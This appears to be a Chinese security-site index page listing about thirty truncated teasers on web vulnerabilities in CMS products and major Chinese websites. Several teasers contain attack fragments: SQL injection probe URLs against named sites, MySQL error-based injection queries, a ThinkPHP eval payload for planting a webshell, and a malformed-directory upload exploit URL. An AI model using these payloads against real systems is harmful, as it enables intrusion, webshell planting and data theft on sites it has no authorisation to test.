ZYCHCMS企业网站管理系统4.2注射及后台拿webshell关注热度:20

①SQL注射漏洞②后台拿WBSHELL详细说明：影响版本：ZYCHCMS企业网站管理系统4.2（存在以下两个文件的版本应该是通杀）①SQL注射漏洞漏洞文件：/admin/add_js.asp /admin/add_xm_jiang.asp漏洞原因：..[详情]

网易直播评论存储型XSS - 网站安全 - 自学php关注热度:26

网易手机直播评论存储型XSS,奥运期间满火的详细说明：http://live.163.com/3g/livelog/如：http://live.163.com/3g/livelog/42838/15/desc/0/1/page.do发表评论:http://live.163.com/3g/chatlog3g/42838/inputCh.....[详情]

新浪及网易邮箱预览存储型XSS - 网站安全 - 自学关注热度:21

今天看到goderci牛发的几个邮箱预览的XSS，觉得肯定还有木有被开发的宝地，于是就去尝试了一下，结果还真有，FLASH、WORD之后 似乎ZIP文件的过滤还没有被安排上议程。压缩文件有一个很..[详情]

178游戏网分站SQL注射 - 网站安全 - 自学php关注热度:18

手工测试、工具测试均显示为php+数字型注射http://bbs.ngacn.cc/read.php?pid=64832566%20and%201=1rand=0.14058642791337117http://bbs.ngacn.cc/read.php?pid=64832566%20and%201=2rand=0.14058642791337117.....[详情]

beescms X-Forwarded-For 注射 - 网站安全 - 自学php关注热度:55

member/member.php文件//........................ $ip=fl_html(fl_value(get_ip())); $sql=update .DB_PRE.member set member_time=#39;{$addtime}#39;,member_ip=#39;{$ip}#39; where id={$last.....[详情]

记一次对某SEO博客的渗透 - 网站安全 - 自学php关注热度:27

以下均谷歌翻译而来，与羽翼本人没有任何关系。某些东西是需要花钱才能看的，尤其是一些网赚的东西。今天看到一篇文章不错，可惜，要购买。于是就邪恶了一下。他的主站没有什..[详情]

关于mysql报错注入的几个语句 - 网站安全 - 自学关注热度:17

报错注入，报user表中的字段:select * from (select * from user a join user b) c;select * from (select * from user a join user b using (host,user)) c;报错注入select 1 from .....[详情]

探测网站(三)nikto探测Web服务器漏洞 - 网站安全关注热度:30

Nikto是一款开源的Web程序扫描器，可以扫描服务器中的存在的一些问题。Nikto是linux/Unix中的一款工具，可以从官方网站上下载，解压到本地运行。这里直接采用backtrack 5中集成的nikto工具..[详情]

探测网站(二)httprint探测Web服务器类型 - 网站安全关注热度:51

搭建Web服务器有很多流行的软件，如unix、linux下的apache、tomcat，windows下的IIS，IBM的 WebSphere，BEA WebLogic还有些小型轻量级的nginx、micro_httpd ndash; really small HTTP serve，LightTPD等.....[详情]

谷歌渗透测试之信息搜集 - 网站安全 - 自学php关注热度:38

渗透攻击要搜集足够的信息，谷歌就是一个强大的搜集信息的工具。谷歌除了平时的信息搜索外，还提供强大的高级命令，供我们进一步控制搜索的结果。1、intitle: 该命令限制搜索结果..[详情]

简单检测某门户站点 - 网站安全 - 自学php关注热度:14

首先到目标站看一眼程序源码随便翻了几个页面一眼看出程序是PHP的习惯性动作查看首页源代码很熟悉了织梦的系统~呵呵看到是织梦的系统了，脑子里瞬间闪现出的就是织梦的默认版本..[详情]

飞飞影视系统2.0.120220(Beta4)版thinkphp任意代码执行关注热度:117

第一个方法 直接执行http://www.2cto.com /index.php?s=vod-search-area-${@print(eval($_POST[c]))} .html直接拿菜刀连接。第二种方法：（这个好麻烦）可以执行构造SESSION，然后直接登录后台，依次执行下边..[详情]

探测网站(一)burp suite探测Web目录 - 网站安全 - 自关注热度:196

攻击目标之前，最重要的是收集信息，搜索引擎就可以自动爬取网站的内容，不过搜索引擎都要遵守robots协议(这个至于360搜索)，robots.txt是网站管理创建的一个txt文件，告诉搜索引擎哪..[详情]

公司客户信息与追踪管理系统CITMS 3.0 注入及上传关注热度:30

管理系统部分功能如下：（１）在线增加、修改、删除管理员（２）在线增加、修改、删除客户记录、支持HTML等..（３）前台记录有追踪功能．．以及追踪记录和点击次数显示源码下载..[详情]

用IPAD盲打PPTV后台 - 网站安全 - 自学php关注热度:21

昨晚带队测试完PPTV.睡前准备使用PPTV看会电影.登陆了我的2020年到期的PPTV会员帐号.发现有意见反馈.过段敲人一段跨站代码.ipad打字真费劲.校验了好几次.确认无误后发送.今天起床后就发..[详情]

好孩子储存型XSS及JBoss控制台漏洞(含修复) - 网站关注热度:27

储存型XSS ：漏洞是发生在 相册 http://album.goodbaby.com1.后台点上传照片2.随便穿图片3.上传成功，弹出对话框 点击 查看刚刚上传的照片4.相册默认名字 是 未命名。5.修改相册名字。6.相册名..[详情]

十九楼存储型小松鼠（XSS），暗杀十九楼小帮办关注热度:41

19楼某处过滤不严格，导致一个敏感地方存储型XSS。再加上COOKIES中木有HTTPONLY，成功暗杀一个十九楼小帮办目测19楼当中各类接口木有REFERER检查，各种CSRF就顺便提一下呗~~~在论坛中随便..[详情]

随手记任意文件上传缺陷及修复 - 网站安全 - 自关注热度:19

随手记任意文件上传听说随手借钱挺好使，注册了个号准备买个会员先试试传头像的时候先发现可以选择全部文件，选了个qq.exe点上传，右下角流量动了下，提示：格式不正确，开fire..[详情]

NeoBill CMS v0.8 Alpha多个缺陷及修复 - 网站安全 - 自关注热度:46

标题：NeoBill CMS v0.8 Alpha - Multiple Web Vulnerabilities介绍=============NeoBill is a web-based Customer Management and Billing solution designed for web hosting providers,p.....[详情]

Subrion CMS 2.2.1 CSRF添加管理员 - 网站安全 - 自学关注热度:49

!--标题: Subrion CMS 2.2.1 CSRF Add Admin Exploit作者: Intelliants LLC程序官网: http://www.subrion.com影响版本: 2.2.1摘要:Subrion is a free open source content management syste.....[详情]

XYCMS注入漏洞0day及修复 - 网站安全 - 自学php关注热度:84

XYCMS最新注入漏洞0dayhttp://www.2cto.com /common.asp?id=16注入漏洞，有很多有防注入系统，如何突破我也不说了！表段默认是admin_user 字段默认是 admin password默认后台http://www.2cto.com /admin/拿.....[详情]

网易邮箱+相册4处XSS - 网站安全 - 自学php关注热度:33

在网易邮箱看到了一些XSS，都是属于比较鸡肋的，但是我认为用一定的手段也是可以利用的，所以将邮箱一共三处外加一个网易相册的存储型打包一起发了。1.名片姓名没有过滤。首先上..[详情]

Wordpress 3.X.X 及以前版本文件包含漏洞 - 网站安全关注热度:25

标题: Wordpress 3.X.X and prior - Path Disclosure/File Inclusion Vulnerabilities.作者: Dark-Puzzle (Souhail Hammou)影响版本: 所有版本均可用开发者: www.wordpress.com测试平台: Windows.....[详情]

115一个越权操作 - 网站安全 - 自学php关注热度:14

115存在记事本功能,记事本有删除功能,删除功能可能没有加上验证用户的函数导致了恶意人的利用。http://115.com/note/?ac=noteop=del数据包nid=xxtrue为成功,false呢就是记事本不存在- -删了100,再删..[详情]

优酷某系统任意代码执行 - 网站安全 - 自学php关注热度:12

优酷某系统任意代码执行，导致服务器沦陷。测试从这里开始http://211.151.146.151splunk，一个日志统计、分析的系统。但是呢，用的是Free版本，所以不能配置设置密码，汗～ 悲剧的是版本..[详情]

Kesion “0day”分析 - 网站安全 - 自学php关注热度:29

影响版本：kesion v6.0-v7.0以及kesion v7.06 eshop版之所以打个引号，感觉这个不能算是0day，因为只是这个漏洞成因，其实都是同一个函数过滤不严造成的。而且，这个漏洞已经被披露。原漏洞..[详情]

医院建站系统任意文件上传漏洞及修复 - 网站安关注热度:37

漏洞文件 ：upfile.aspx 我先贴98行到130行代码出来,看着有点搞笑！01 }02 function chkform()03 {0405 if ($(fm_file).value==)06 {07 // alert(请先点击[浏览...]按钮，选择你要上传的文件！.....[详情]

对护卫神防火墙的分析 - 网站安全 - 自学php关注热度:17

作者：conqu3r Pax.Mac Team核心成员上个礼拜很不给力，本来答应进行一个主题演讲的，后来只讲了burpsuite的一种用法。很对不起大家，这个礼拜的议题是绕过，虽然这次来的人比较少，不过..[详情]

嘉友科技cms上传漏洞及修复 - 网站安全 - 自学p关注热度:25

程序采用的上传页uploadfile.asp未进行验证，导致建立畸形目录上传图片木马获取shell漏洞。exp：http://www.2cto.com /admin/uploadfile.asp?uppath=mad.aspupname=uptext=form1.mad.asp他原上传目录是:http:.....[详情]

毕业论文选题系统上传漏洞及修复 - 网站安全关注热度:10

在A5学校班级网站系统推荐中看到的，无聊就下载下来看看漏洞出在fileload目录下的FileUpload.asp文件中，用的是无惧组建上传-var fu = new FileUpload(uploadF.....[详情]